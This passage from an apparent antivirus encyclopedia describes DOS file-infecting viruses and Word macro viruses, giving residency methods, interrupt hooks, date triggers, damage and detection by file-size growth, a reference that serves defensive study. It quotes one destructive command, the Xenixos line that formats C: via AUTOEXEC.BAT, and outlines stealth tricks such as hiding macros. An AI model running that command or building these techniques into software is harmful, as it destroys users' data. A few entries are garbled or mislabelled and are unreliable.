  12446. 3) Infected files can be infected again.
  12447.  
  12448. Detecting Method: Infected file sizes  increase by 783 bytes.
  12449.  
  12450. [Adolf_Hitler]
  12451. Virus Name: Adolf_Hitler
  12452. Virus Type: COM File infector
  12453. Virus Length: 475 bytes
  12454.  
  12455. Executing Procedure:
  12456. Checks whether it has stayed resident in memory. If not, it will
  12457. stay resident in high memory. Then hooks INT 21h and goes back to
  12458. original routine.
  12459.  
  12460. Vectors hooked:
  12461. Hooks INT 21H(AH=4Bh) to infect files. First, it will hang INT
  12462. 24h to prevent divulging its trace when writing. If the program
  12463. to be executed is an uninfected COM file, virus proceeds to
  12464. infect it.
  12465.  
  12466. Damage: None
  12467.  
  12468. Detecting Method: Infected file sizes increase by 475 bytes.
  12469.  
  12470. [Fob]
  12471. Virus Name: Fob
  12472. Virus Type: COM File infector
  12473. Virus Length:  1750-1950 bytes
  12474.  
  12475. Executing Procedure:
  12476. Virus searches for an uninfected COM file on current directory,
  12477. then infects it (Infects only one file at a time).   There is a
  12478. 50% chance that virus will display a  message asking user to
  12479. input the following word: "SLOVAKIA."  Program will wait until
  12480. user inputs this word and will proceed to terminate program.
  12481.  
  12482. Damage: None
  12483.  
  12484. Note:
  12485. 1) It does not stay resident in memory.
  12486. 2) You will see an error message when writing because INT 24h has
  12487.    not been hanged.
  12488.  
  12489. Detecting Method: Infected files will ask user to input words
  12490. like "SLOVAKIA", and does not end until user has done so.
  12491.  
  12492. [Signs]
  12493. Virus Name: Signs
  12494. Virus Type: COM  File infector
  12495. Virus Length:  720 bytes
  12496.  
  12497. Executing Procedure:
  12498. Virus checks whether it has stayed resident in memory. If not, it
  12499. will stay resident in high memory. Then hooks INT 21h and goes
  12500. back to original routine. It will check whether current calendar
  12501. day is Friday. If it is, screen will roll up once a minute.
  12502.  
  12503. Vectors hooked:
  12504. Hooks INT 21H(AH=4Bh) to infect files. First, it will hang INT
  12505. 24h to prevent divulging its trace when writing. If the program
  12506. to be executed is an uninfected COM file, virus proceeds to
  12507. infect it.
  12508.  
  12509. Damage: None
  12510.  
  12511. Detecting Method: Infected file sizes increase by 720 bytes.
  12512.  
  12513. [Shield]
  12514. Virus Name: Shield
  12515. Virus Type: COM  File infector
  12516. Virus Length:  172 bytes
  12517.  
  12518. Executing Procedure:
  12519. Virus checks whether it has stayed resident in memory. If not, it
  12520. will stay resident in high memory. Then hooks INT 21h and goes
  12521. back to original routine.
  12522.  
  12523. Vectors hooked:
  12524. Hooks INT 21H(AH=4Bh) to infect files. If the program to be
  12525. executed is an uninfected COM file, virus proceeds to infect it.
  12526.  
  12527. Damage: None
  12528.  
  12529. Note:
  12530. 1) You will see an error message when writing because INT 24h has
  12531.    not been hanged.
  12532. 2) The function of the infected program is different from the
  12533.    original. Infected files have no ability to infect other
  12534.    files. But they can display a message when current month is
  12535.    February. The message is the following:
  12536.  
  12537.    "I greet you user .
  12538.     I am COM-CHILD, son of The Breeder Virus.
  12539.     Look out for the RENAME-PROBLEM !"
  12540.  
  12541. Detecting Method: Infected file sizes increase by 172 bytes.
  12542.  
  12543. [Wishes]
  12544. Virus Name: Wishes
  12545. Virus Type: COM  & EXE File infector
  12546. Virus Length:  970 bytes
  12547.  
  12548. Executing Procedure:
  12549. Virus checks whether it has stayed resident in memory. If not, it
  12550. will stay resident in high memory. Then hooks INT 21h and goes
  12551. back to original routine. It will check whether current calendar
  12552. day is 13, Friday. If it is, virus proceeds to destroy all data
  12553. on hard diskette.
  12554.  
  12555. Vectors hooked:
  12556. Hooks INT 21H (AH=4Bh) to infect files. First, it will hang INT
  12557. 24h to prevent divulging its trace when writing. If the program
  12558. to be executed is an uninfected COM or EXE file, virus proceeds
  12559. to infect it.
  12560.  
  12561. Damage:  Virus will sometimes destroy all data on hard diskette.
  12562.  
  12563. Detecting Method: Infected file sizes increase by 970 bytes.
  12564.  
  12565. [439]
  12566. Virus Name: 439
  12567. Virus Type: COM File infector
  12568. Virus Length:  439 bytes
  12569.  
  12570. Executing Procedure:
  12571. Virus checks whether it has stayed resident in memory. If not, it
  12572. will stay resident in high memory. Then hooks INT 21h and goes
  12573. back to original routine.
  12574.  
  12575. Vectors hooked:
  12576. Hooks INT 21H(AH=4Bh) to infect files. First, it will hang INT
  12577. 24h to prevent divulging its trace when writing. If the program
  12578. to be executed is an uninfected COM file, virus proceeds to
  12579. infect it.
  12580.  
  12581. Damage: None
  12582.  
  12583. Detecting Method: Infected file sizes increase by 439 bytes.
  12584.  
  12585. [4-A]
  12586. Virus Name: 4-A
  12587. Virus Type: COM File infector
  12588. Virus Length:  450-460 bytes
  12589.  
  12590. Executing Procedure:
  12591. Virus displays the following message:
  12592.  
  12593.     "-----Hello  , I am virus ! -----".
  12594.  
  12595. Virus then searches for an uninfected COM file on current
  12596. directory and infects it (It infects only one file at a time).
  12597.  
  12598. Damage: None
  12599.  
  12600. Note:
  12601. 1) It does not stay resident in memory.
  12602. 2) You will see an error message when writing because INT 24h has
  12603.    not been hanged.
  12604.  
  12605. Detecting Method:
  12606. 1) Infected files display above message when executed
  12607. 2) Infected file sizes increase by 450-460 bytes.
  12608.  
  12609. [330]
  12610. Virus Name: 330
  12611. Virus Type: COM File infector
  12612. Virus Length:  330 bytes
  12613.  
  12614. Executing Procedure:
  12615. Virus searches for an uninfected COM file on current directory
  12616. and infects it (It infects only one file at a time). Virus will
  12617. then check whether current month is July. If it is, virus
  12618. displays the following message:
  12619.  
  12620.     "[330] by ICE-9."
  12621.  
  12622. Damage: None
  12623.  
  12624. Note:
  12625. 1) It does not stay resident in memory.
  12626. 2) You will see an error message when writing because INT 24h has
  12627.    not been hanged.
  12628.  
  12629. Detecting Method: Infected file sizes increase by 330 bytes.
  12630.  
  12631. [203]
  12632. Virus Name: 203
  12633. Virus Type: COM File infector
  12634. Virus Length:  203 bytes
  12635.  
  12636. Executing Procedure:
  12637. Virus searches for an uninfected COM file on current directory,
  12638. then infects it (It infects only one file at a time).
  12639.  
  12640. Damage: None
  12641.  
  12642. Note:
  12643. 1) It does not stay resident in memory.
  12644. 2) You will see an error message when writing because INT 24h has
  12645.    not been hanged.
  12646.  
  12647. Detecting Method: Infected file sizes increase by 203 bytes.
  12648.  
  12649. [Mr-Vir]
  12650. Virus Name: Mr-Vir
  12651. Virus Type: COM File infector
  12652. Virus Length:  508 bytes
  12653.  
  12654. Executing Procedure:
  12655. Virus searches for an uninfected COM file on current directory,
  12656. then infects it (It infects only one file at a time).
  12657.  
  12658. Damage: None
  12659.  
  12660. Note:
  12661. 1) It does not stay resident in memory.
  12662. 2) You will see an error message when writing because INT 24h has
  12663.    not been hanged.
  12664.  
  12665. Detecting Method: Infected file sizes increase by 508 bytes.
  12666.  
  12667. [Nazgul]
  12668. Virus Name: Nazgul
  12669. Virus Type: COM File infector
  12670. Virus Length:  266 bytes
  12671.  
  12672. Executing Procedure:
  12673. Virus searches for all infected COM files on current directory,
  12674. then infects them.
  12675.  
  12676. Damage: None
  12677.  
  12678. Note:
  12679. 1) It does not stay resident in memory.
  12680. 2) You will see an error message when writing because INT 24h has
  12681.    not been hanged.
  12682.  
  12683. Detecting Method: Infected file sizes increase by 266 bytes.
  12684.  
  12685. [Napc]
  12686. Virus Name: Napc
  12687. Virus Type: COM & EXE File infector
  12688. Virus Length:  729 bytes
  12689.  
  12690. Executing Procedure:
  12691. Virus searches for all infected COM & EXE files on current
  12692. directory, proceeds then to infect them.
  12693.  
  12694. Damage: None
  12695.  
  12696. Note:
  12697. 1) It does not stay resident in memory.
  12698. 2) You will see an error message when writing because INT 24h has
  12699.    not been hanged.
  12700.  
  12701. Detecting Method: Infected file sizes increase by 729 bytes.
  12702.  
  12703. [Little]
  12704. Virus Name: Little
  12705. Virus Type: COM File infector
  12706. Virus Length:  665 bytes
  12707.  
  12708. Executing Procedure:
  12709. Virus searches for an uninfected COM file on current directory,
  12710. then infects it (It infects only one file at a time).
  12711.  
  12712. Damage: None
  12713.  
  12714. Note:
  12715. 1) It does not stay resident in memory.
  12716. 2) You will see an error message when writing because INT 24h has
  12717.    not been hanged.
  12718.  
  12719. Detecting Method: Infected file sizes increase by 665 bytes.
  12720.  
  12721. [Atte-629]
  12722. Virus Name: Atte-629
  12723. Virus Type: COM File infector
  12724. Virus Length:  629 bytes
  12725.  
  12726. Executing Procedure:
  12727. Virus searches for an uninfected COM file on current directory,
  12728. then infects it (It infects only one file at a time).
  12729.  
  12730. Damage: None
  12731.  
  12732. Note:
  12733. 1) It does not stay resident in memory.
  12734. 2) You will see an error message when writing because INT 24h has
  12735.    not been hanged.
  12736.  
  12737. Detecting Method: Infected file sizes increase by 629 bytes.
  12738.  
  12739. [A&A]
  12740. Virus Name: A&A
  12741. Virus Type: COM File infector
  12742. Virus Length:  506 bytes
  12743.  
  12744. Executing Procedure:
  12745. Virus checks whether it has stayed resident in memory. If not, it
  12746. will stay resident in high memory. Then hooks INT 21h and goes
  12747. back to original routine.
  12748.  
  12749. Vectors hooked:
  12750. Hooks INT 21H(AH=4Bh) to infect files. First, it will hang INT
  12751. 24h to prevent divulging its trace when writing. If the program
  12752. to be executed is an uninfected COM file, virus proceeds to
  12753. infect it.
  12754.  
  12755. Damage: None
  12756.  
  12757. Detecting Method: Infected file sizes increase by 506 bytes.
  12758.  
  12759. [Magnitogorski-3]
  12760. Virus Name: Magnitogorski-3
  12761. Virus Type: COM & EXE File infector
  12762. Virus Length:  3000 bytes
  12763.  
  12764. Executing Procedure:
  12765. Virus checks whether it has stayed resident in memory. If not, it
  12766. will stay resident in high memory. Then hooks INT 21h and goes
  12767. back to original routine.
  12768.  
  12769. Vectors hooked:
  12770. Hooks INT 21H(AH=4Bh) to infect files. First, it will hang INT
  12771. 24h to prevent divulging its trace when writing. If the program
  12772. to be executed is an uninfected COM or EXE file, virus proceeds
  12773. to infect it.
  12774.  
  12775. Damage: None
  12776.  
  12777. Detecting Method: Infected file sizes increase by 3000 bytes.
  12778.  
  12779. [Lpt-Off]
  12780. Virus Name: Lpt-Off
  12781. Virus Type: COM File infector
  12782. Virus Length:  256 bytes
  12783.  
  12784. Executing Procedure:
  12785. Virus checks whether it has stayed resident in memory. If not, it
  12786. will stay resident in high memory. Then hooks INT 21h and goes
  12787. back to original routine.
  12788.  
  12789. Vectors hooked:
  12790. Hooks INT 21H(AH=4Bh) to infect files. If the program to be
  12791. executed is an uninfected COM file, virus proceeds to infect it.
  12792.  
  12793. Damage: None
  12794.  
  12795. Note: You will see an error message when writing because INT 24h
  12796. has not been hanged.
  12797.  
  12798. Detecting Method: Infected file sizes increase by 256 bytes.
  12799.  
  12800. [Kiwi-550]
  12801. Virus Name: Kiwi-550
  12802. Virus Type: EXE File infector
  12803. Virus Length:  550-570 bytes
  12804.  
  12805. Executing Procedure:
  12806. Virus checks whether it has stayed resident in memory. If not, it
  12807. will stay resident in high memory. Then hooks INT 21h and goes
  12808. back to original routine.
  12809.  
  12810. Vectors hooked:
  12811. Hooks INT 21H(AH=4Bh) to infect files. First, it will hang INT
  12812. 24h to prevent divulging its trace when writing. If the program
  12813. to be executed is an uninfected EXE file, virus proceeds to
  12814. infect it.
  12815.  
  12816. Damage: None
  12817.  
  12818. Detecting Method: Infected file sizes increase by 550-570 bytes.
  12819.  
  12820. [Dennis-2]
  12821. Virus Name: Dennis-2
  12822. Virus Type: COM & EXE File infector
  12823. Virus Length:  897 bytes
  12824.  
  12825. Executing Procedure:
  12826. Virus checks whether it has stayed resident in memory. If not, it
  12827. will stay resident in high memory. Then hooks INT 21h and goes
  12828. back to original routine.
  12829.  
  12830. Vectors hooked:
  12831. Hooks INT 21H(AH=4Bh) to infect files. If the program to be
  12832. executed is an uninfected COM or EXE file, virus proceeds to
  12833. infect it.
  12834.  
  12835. Damage: None
  12836.  
  12837. Detecting Method: Infected file sizes increase by 897 bytes.
  12838.  
  12839. [Beer]
  12840. Virus Name: Beer
  12841. Virus Type: File infector
  12842. Virus Length:
  12843.  
  12844. Executing Procedure:
  12845. Virus checks whether it has stayed resident in memory. If not, it
  12846. will stay resident in high memory. Then hooks INT 21h and goes
  12847. back to original routine.
  12848.  
  12849. Vectors hooked:
  12850. Hooks INT 21H(AH=4Bh) to infect files. First, it will hang INT
  12851. 24h to prevent divulging its trace when writing. If the program
  12852. to be executed is an uninfected file, virus proceeds to infect
  12853. it.
  12854.  
  12855. Damage: None
  12856.  
  12857. Note: This virus has at least three variations.
  12858.  
  12859. [2560]
  12860. Virus Name: 2560
  12861. Virus Type: COM & EXE File infector
  12862. Virus Length:  2560 bytes
  12863.  
  12864. Executing Procedure:
  12865. Virus checks whether it has stayed resident in memory. If not, it
  12866. will stay resident in high memory. Then hooks INT 21h and goes
  12867. back to original routine.
  12868.  
  12869. Vectors hooked:
  12870. Hooks INT 21H(AH=4Bh) to infect files. First, it will hang INT
  12871. 24h to prevent divulging  its trace when writing. If the program
  12872. to be executed is an uninfected COM or EXE file, virus proceeds
  12873. to infect it.
  12874.  
  12875. Damage: None
  12876.  
  12877. Detecting Method: Infected file sizes increase by 2560 bytes.
  12878.  
  12879. [Atas-3321]
  12880. Virus Name: Atas-3321
  12881. Virus Type: COM File infector
  12882. Virus Length:  3321 bytes
  12883.  
  12884. Executing Procedure:
  12885. Virus checks whether it has stayed resident in memory. If not, it
  12886. will stay resident in high memory. Then hooks INT 21h and goes
  12887. back to original routine. (Virus can only execute its program on
  12888. DOS 3.3.)
  12889.  
  12890. Vectors hooked:
  12891. Hooks INT 21H(AH=4Bh) to infect files. First, it will hang INT
  12892. 24h to prevent divulging its trace when writing. If the program
  12893. to be executed is an uninfected COM file, virus proceeds to
  12894. infect it.
  12895.  
  12896. Damage: None
  12897.  
  12898. Detecting Method:
  12899. Infected file sizes increase by 3321 bytes.
  12900.  
  12901. [Ecu]
  12902. Virus Name: Ecu
  12903. Virus Type: EXE File infector
  12904. Virus Length:  711 bytes
  12905.  
  12906. Executing Procedure:
  12907. Virus checks whether it has stayed resident in memory. If not, it
  12908. will stay resident in high memory. Then hooks INT 21h and goes
  12909. back to original routine. (Virus can only execute its program on
  12910. DOS 3.3.)
  12911.  
  12912. Vectors hooked:
  12913. Hooks INT 21H(AH=4Bh) to infect files. First, it will hang INT
  12914. 24h to prevent divulging its trace when writing. If the program
  12915. to be executed is an uninfected EXE file, virus proceeds to
  12916. infect it.
  12917.  
  12918. Damage:
  12919. Most infected files cannot be executed. Detecting Method:
  12920. Infected file sizes increase by 711 bytes.
  12921.  
  12922. [N1]
  12923. Virus Name: N1
  12924. Virus Type: COM File infector
  12925. Virus Length: 10,230-10,240 bytes
  12926.  
  12927. Executing Procedure:
  12928. Virus searches for an uninfected COM file on current directory,
  12929. then infects it (Infects only one file at a time). Virus will
  12930. then display the following message:
  12931.  
  12932. "This File Has Been Infected By NUMBER One!"
  12933.  
  12934. Damage: None
  12935.  
  12936. Note:
  12937. 1) It does not stay resident in memory.
  12938. 2) You will see an error message when writing because INT 24h has
  12939.    not been hanged.
  12940.  
  12941. Detecting Method:
  12942. 1) Infected files will display the above message when executed.
  12943.  
  12944. [Arcv-718]
  12945. Virus Name: Arcv-718
  12946. Virus Type: COM & EXE File infector
  12947. Virus Length:  718 bytes
  12948.  
  12949. Executing Procedure: Virus checks whether it has stayed resident
  12950. in memory. If not, it will stay resident in high memory. Then
  12951. hooks INT 21h and goes back to original routine. It will check
  12952. whether current date is between 1 and 7, January. If it is, virus
  12953. will display the following message and proceed to hang the
  12954. system:
  12955.  
  12956. "Hello Dr Sol & Fido Lurve U lots...    "
  12957.  
  12958. Vectors hooked: Hooks INT 21H(AH=4Bh) to infect files. If the
  12959. program to be executed is an uninfected COM or EXE file, virus
  12960. proceeds to infect it.
  12961.  
  12962. Damage: Virus will sometimes halt the system.
  12963.  
  12964. Detecting Method: Infected file sizes increase by 718 bytes.
  12965.  
  12966. [L-933]
  12967. Virus Name: L-933
  12968. Virus Type: COM File infector
  12969. Virus Length:  933-950 bytes
  12970.  
  12971. Executing Procedure: Virus searches for an uninfected COM file on
  12972. current directory, then infects it (Infects only one file at a
  12973. time).   No matter whether it has infected a file or not, it will
  12974. check current date.
  12975. 1) If it is March 8, virus destroys all data on hard diskette.
  12976. 2) If it is September 1, virus deletes itself.
  12977.  
  12978. Damage:  Virus will sometimes destroy all data on hard diskette.
  12979.  
  12980. Note:
  12981. 1) It does not stay resident in memory.
  12982. 2) You will see an error message when writing because INT 24h has
  12983.    not been hanged.
  12984.  
  12985. Detecting Method: Infected file sizes increase by 933-950 bytes.
  12986.  
  12987. [Alpha743]
  12988. Virus Name: Alpha743
  12989. Virus Type: COM File infector
  12990. Virus Length:  743 bytes
  12991.  
  12992. Executing Procedure: Virus searches for an uninfected COM file on
  12993. current directory, then infects it (Infects only one file at a
  12994. time).   No matter whether it has infected a file or not, it will
  12995. check whether current year is 1993 or later.  If current month is
  12996. later than February, and current day is 5, virus will display the
  12997. following message:
  12998.  
  12999.         "Your PC has ALPHA virus.
  13000.          Brought to you by the ARCV
  13001.          Made in ENGLAND"
  13002.  
  13003. Damage: None
  13004.  
  13005. Note:
  13006. 1) It does not stay resident in memory.
  13007. 2) You will see an error message when writing because INT 24h has
  13008.    not been hanged.
  13009.  
  13010. Detecting Method: Infected file sizes increase by 743 bytes.
  13011.  
  13012. [Clint]
  13013. Virus Name: Clint
  13014. Virus Type: COM & EXE File infector
  13015. Virus Length:
  13016.  
  13017. Executing Procedure: Virus searches for uninfected COM or EXE
  13018. files on current directory, then infects it (Infects four files
  13019. at a time). The virus then displays the following message:
  13020. "memory allocation error !"
  13021.  
  13022. Damage: It will overwrite original files with a virus code.
  13023. Original files are destroyed.
  13024.  
  13025. Note:
  13026. 1) It does not stay resident in memory.
  13027. 2) You will see an error message when writing because INT 24h has
  13028.    not been hanged.
  13029.  
  13030. Detecting Method: Infected files display the above message
  13031. when executed.
  13032.  
  13033. [Love-Child-2710]
  13034. Virus Name: Love-Child-2710
  13035. Virus Type: COM File infector
  13036. Virus Length:  2710 bytes
  13037.  
  13038. Executing Procedure: Virus checks whether current date is one of
  13039. the following dates: November 5, February 22, June 23, August 24,
  13040. or October 6, or that the system is not DOS 3.3. If these
  13041. conditions are met, virus destroys Partition and parts of FAT. If
  13042. conditions are not met, virus checks whether it has stayed
  13043. resident in memory. If not, it will stay resident in high memory.
  13044. Then hooks INT 13h and goes back to original routine.
  13045.  
  13046. Vectors hooked: Hooks INT 13H to infect files. First, it will
  13047. hang INT 24h to prevent divulging its trace when writing. If the
  13048. program to be executed is an uninfected COM file, virus proceeds
  13049. to infect it.
  13050.  
  13051. Damage: Virus sometimes destroys Partition and parts of Fat.
  13052.  
  13053. Detecting Method: Infected file sizes increase by 2710 bytes.
  13054.  
  13055. [Basedrop]
  13056. Virus Name: Basedrop
  13057. Virus Type: EXE File infector
  13058. Virus Length:
  13059.  
  13060. Executing Procedure:
  13061. 1) There is a 25% chance that the virus will do the following:
  13062.    Searches for an uninfected EXE file on current directory, then
  13063.    infects it (Infects only one file at a time).
  13064. 2) There is a 25% chance that the virus will do the following:
  13065.    Carries-out above procedure. Then, virus displays a message
  13066.    asking user to input the following word: "SLOVAKIA." Virus
  13067.    will wait until user inputs this word.  Virus will then
  13068.    terminate.
  13069. 3) There is a 50% chance that virus program will not infect
  13070.    files.
  13071.  
  13072. Damage: None
  13073.  
  13074. [Arianna]
  13075. Virus Name:  ARIANNA
  13076. Virus Type: Multi-partite virus
  13077.  
  13078. 1. High memory resident file infector. The ARIANNA virus will
  13079.    only infect .EXE files which are shorter than 70000H bytes in
  13080.    length and bigger than 1770H bytes in length.
  13081. 2. Partition sector infector.  This virus overwrites the last 9
  13082.    sectors of the hard drive.
  13083.  
  13084. Virus Length:  Virus length in EXE files is 3426 bytes and 3586
  13085. bytes in memory.
  13086.  
  13087. Interrupt Vectors Hooked:  INT 21h.
  13088.  
  13089. Infection Process: This virus is spread by executing an infected
  13090. program or a computer   with a partition that has been infected.
  13091. When a file infected with the ARIANNA virus is executed, it will
  13092. check to see if it is already resident in memory by checking to
  13093. see if the return value of ax is equal to 0 after int
  13094. 2f(ax=FE01).  If virus is already in memory it will execute the
  13095. infected program.  Virus code remains resident in high memory.
  13096.  
  13097. Damage:  Decreases available memory.  Infected file size
  13098. increases by 3426 bytes.
  13099.  
  13100. Symptoms: While the ARIANNA virus is resident in memory you
  13101. cannot alter the HD partition to causdany damage to the partition
  13102. sector by cleaning it. The way to clean the ARIANNA virus from
  13103. the system is to boot up the computer with a clean bootsb;r
  13104. system diskette and overwrite the infected partition sector with
  13105. the No.9.
  13106.  
  13107. [Boza]
  13108. Virus Name: Boza
  13109. Alias Name: Bizatch
  13110. Virus Type: File Virus
  13111. Virus Length: 2,680 bytes
  13112. Description: This virus infects .EXE files.
  13113.  
  13114. When an infected file is executed, the virus
  13115. does not install itself into memory.  The virus 
  13116. will infect files which are in Microsoft's Win32 
  13117. Portable Executable (PE) file format which means 
  13118. that the virus will only infect Win95 and Win32S 
  13119. executable files.  The virus attempts to infect 
  13120. up to three files in the current directory,
  13121. however due to some bugs in the program it may 
  13122. end up corrupting the files it infects.
  13123.  
  13124. When the system date reaches the 31st of any month
  13125. the virus will display the following message:
  13126.  
  13127.   "The taste of fame just got tastier!
  13128.    VLAD Australia does it again with 
  13129.    the world's first Win95 Virus.
  13130.  
  13131.    From the old school to the new.
  13132.  
  13133.    Metabolis
  13134.    Qark
  13135.    Darkman
  13136.    Automag
  13137.    Antigen
  13138.    RhinceWind
  13139.    Quantum
  13140.    Absolute Overload
  13141.    CoKe"
  13142.  
  13143. The virus also contains the following text string:
  13144.  
  13145.   "Please note: the name of this virus is [Bizatch]
  13146.    written by Quantum of VLAD"
  13147.  
  13148. [Winword.Colors]
  13149. Virus Name: Colors
  13150. Alias Name: WordMacro.Colors
  13151. Virus Type: Word macro virus
  13152. Virus Length: N/A
  13153. Description: This virus infects MS Word documents.
  13154.  
  13155. This macro virus consists of the following macros:
  13156.  
  13157.     AutoClose
  13158.     AutoExec
  13159.     AutoOpen
  13160.     FileExit
  13161.     FileNew
  13162.     FileSave
  13163.     FileSaveAs
  13164.     ToolsMacro
  13165.  
  13166. Whenever an infected Word document is opened the virus
  13167. will become active by infecting the global template.
  13168.  
  13169. Once the virus is active the virus will infect all
  13170. documents created using the "File/New" command and also
  13171. all files which are saved using the "File/Save" command
  13172. or "File/Save As" command.
  13173.  
  13174. The virus changes many of the menu items to make it
  13175. difficult to delete. For example, it effectively
  13176. removes the Tools Macros command so you can't list or
  13177. delete the macros in a program with that command.
  13178.  
  13179. The virus has a counter which is increased after every
  13180. access.  When the counter reaches 300, the virus
  13181. changes the Windows colors settings to randomly
  13182. selected colors which come into effect the next time
  13183. Windows is started.
  13184.  
  13185.  
  13186. [Word.Demonstrate]
  13187. Virus Name: DMV Word (Demonstration Macro Virus)
  13188. Alias Name:
  13189. Virus Type: Word macro virus
  13190. Virus Length: N/A
  13191. Description: This virus infects MS Word documents.
  13192.  
  13193. This virus consists of the following macro:
  13194.  
  13195.     AutoClose
  13196.  
  13197. When an infected file is opened, the virus infects the
  13198. global template "Normal.dot" by inserting a single
  13199. macro.
  13200.  
  13201. Once the virus is active, it will infect all new
  13202. documents when they are being closed.
  13203.  
  13204.  
  13205. [Winexcel.DMV]
  13206. Virus Name: DMV Excel (Demonstration Macro Virus)
  13207. Alias Name:
  13208. Virus Type: Excel macro virus
  13209. Virus Length: N/A
  13210. Description: This virus infects MS Excel documents.
  13211.  
  13212. This virus consists of the following macros:
  13213.  
  13214.     AutoClose
  13215.  
  13216. When an infected file is closed, the virus adds a
  13217. single macro to the global macro file.  Subsequent
  13218. files which are closed also have the macro attached.
  13219.  
  13220. This virus does not work because of a bug in the
  13221. program.
  13222.  
  13223.  
  13224. [Word.Fmt.Trajon]
  13225. Virus Name: FormatC
  13226. Alias Name:
  13227. Virus Type: Word macro virus
  13228. Virus Length: N/A
  13229. Description: This virus infects MS Word documents.
  13230.  
  13231. This virus consists of the following macro:
  13232.  
  13233.     AutoOpen
  13234.  
  13235. When an infected file is opened, the virus infects the
  13236. global template "Normal.dot" by inserting a single
  13237. macro.
  13238.  
  13239. Once the virus is active, it will attempt to format C:
  13240. drive.
  13241.  
  13242.  
  13243. [Word.Nuclear]
  13244. Virus Name: Nuclear
  13245. Alias Name:
  13246. Virus Type: Word macro virus
  13247. Virus Length: N/A
  13248. Description: This virus infects MS Word documents.
  13249.  
  13250. This virus consists of the following macros:
  13251.  
  13252.     AutoExec
  13253.     AutoOpen
  13254.     DropSuriv
  13255.     FileExit
  13256.     FilePrint
  13257.     FilePrint
  13258.     Default
  13259.     FileSaveAs
  13260.     InsertPayload
  13261.     Payload
  13262.  
  13263. When an infected file is opened, the AutoOpen macro is
  13264. run which infects the global template.  All files saved
  13265. using the "File/Save As" command will be infected
  13266.  
  13267. During document printing, if the seconds are between 55
  13268. and 59, two following two lines of text will be added
  13269. to the end of the last page being printed:
  13270.  
  13271.     "And finally I would like to say:"
  13272. "STOP ALL FRENCH NUCLEAR TESTING IN THE 
  13273. PACIFIC!"
  13274.  
  13275. After the 5th of April the virus attempts to delete
  13276. your system files but fails because of a bug in the
  13277. virus. The virus also attempts to infect the system
  13278. with a Suriv binary virus, but fails again because of a
  13279. bug.
  13280.  
  13281. [Word.Xenixos]
  13282. Virus Name: Word.Macro.Xenixos 
  13283. Alias Name: Nemesis, Xos, Evil One, Xenixos:De 
  13284. Virus Type: Word macro virus
  13285. Virus Length: 31342 Bytes (11 Macros)
  13286. Infection: German Microsoft Word documents and templates
  13287. Symptoms:Text added to printed documents
  13288.          Format of C:\ drive
  13289.          Change of C:\AUTOEXEC.BAT
  13290.          Display of windows
  13291.  
  13292. Description: This virus infects MS Word documents.
  13293. Xenixos is the first macro virus that was written especially
  13294. for the German version of Microsoft Word. All macro 
  13295. names are in German, and therefore it only works with the
  13296. German Word version. The virus was found in Austria, and
  13297. is also posted in Usenet.
  13298.  
  13299. The following macros can be found in infected documents 
  13300. and viewed with the
  13301. Datei|Dokumentvorlage|Organisieren|Makros command.
  13302.  
  13303. "AutoExec"
  13304. "AutoOpen"
  13305. "DateiBeenden"
  13306. "DateiDrucken"
  13307. "DateiDruckenStandard"
  13308. "DateiOeffnen"
  13309. "DateiSpeichern"
  13310. "DateiSpeichernUnter"
  13311. "Drop"
  13312. "Dummy"
  13313. "ExtrasMakro"
  13314.  
  13315. The infected global template (NORMAL.DOT) includes
  13316. the following additional macros:
  13317.  
  13318. "AutoClose"
  13319. "AutoExit"
  13320. "AutoNew"
  13321.  
  13322. They all contain the empty macro "Dummy".
  13323.  
  13324. Upon opening of an infected document, Xenixos infects 
  13325. the global template unless the "DateiSpeichernUnter"
  13326. macro is already present. Xenixos spreads upon using the
  13327.  "DateiSpeichern" ("FileSave") and "DateiSpeichernUnter"
  13328. ("FileSaveAs") command. All its macros are Execute-Only,
  13329. and therefore they can not be viewed or modified. Files with
  13330. the name "VIRUS.DOT" will not become infected.
  13331.  
  13332. During infection, Xenixos checks the system date and then
  13333. activates various destructive payloads according the the
  13334. date. During the month of May it adds the following 
  13335. text to "C:\AUTOEXEC.BAT":
  13336.  
  13337. "    @echo j format c: /u > nul   "
  13338.  
  13339. This will format the C:\ drive if the DOS "format" 
  13340. command is present.
  13341.  
  13342. During the month of March, Xenixos tries to activate the 
  13343. DOS-Virus "Neuroquila" by using a DOS DEBUG script. 
  13344. This part of the virus is
  13345. faulty (it tries to create an .EXE file) and therefore the 
  13346. DOS-based virus never infects the system.
  13347.  
  13348. The third destructive payload checks the system time, 
  13349. and in case of a value bigger than 45 in the seconds field, 
  13350. it will add the password "XENIXOS" to a saved document.
  13351.  
  13352. Upon printing a document, Xenixos checks the system 
  13353. time again, and in case of a value smaller than 30 in the
  13354. seconds field, it will add
  13355. the following text to the end of the printed document:
  13356.  
  13357. "    Nemesis Corp.                          "
  13358.  
  13359. Xenixos also includes some additional tricks to make its
  13360. detection more difficult. It turns of the prompting of 
  13361. Word before saving a modified global template and replaces
  13362. the Tools|Macros command with code that will display the
  13363. following error message instead of the activation of 
  13364. Word's built-in macro viewer/editor:
  13365.  
  13366. "  Diese Option ist derzeit leider nicht verfuegbar    "
  13367.  
  13368. (This prevents the user from seeing the virus's macros).
  13369.  
  13370. Upon starting MS Word, Xenixos copies parts of its virus  
  13371. macros and saves them with new names, (for example:
  13372. "DateiSpeichern" -> "DateiSpeichernBak").
  13373. After a document is opened, Xenixos restores its backups.
  13374.  
  13375. The following text is also found in the virus code, yet is
  13376. never displayed:
  13377.  
  13378. " Brought to you by the Nemesis Corporation (c) 1996 "
  13379.  
  13380. In addition, Xenixos changes section "Compatibility" 
  13381. inside the WIN.INI file.  It sets the variable "RR2CD"
  13382. to the value "0x0020401", and the variable "Diag$" to
  13383. "0". The WIN.INI variables can be used to deactivate 
  13384. the virus.  Setting the variable "Diag$" to "1" will 
  13385. prevent most of the destructive payloads.
  13386.  
  13387. Some replicants of Xenixos will also display the following 
  13388. Wordbasic error message:
  13389.  
  13390. "  Falscher Parameter  "
  13391.  
  13392.  
  13393. [Word.Wieder]
  13394. Virus Name: Xenixos 
  13395. Alias Name: Wieder, Pferd 
  13396. Virus Type: Word macro virus
  13397. Virus Length: 638 Bytes (2 Macros)
  13398. Symptoms: C:\Autoexec.bat is moved and deleted 
  13399. Place of origin: Germany
  13400. Description: This virus infects MS Word documents.
  13401. Wieder is a not a virus but a trojan horse, since it does
  13402. not infect other files.
  13403.  
  13404. The following unencrypted macros can be found inside
  13405. infected documents:
  13406. "AutoClose"
  13407. "AutoOpen"
  13408. When opening an infected document, Wieder creates 
  13409. the directory "C:\TROJA", and moves the system file
  13410. "C:\AUTOEXEC.BAT" into the newly created directory.
  13411. After moving the file the original files are deleted.
  13412.  
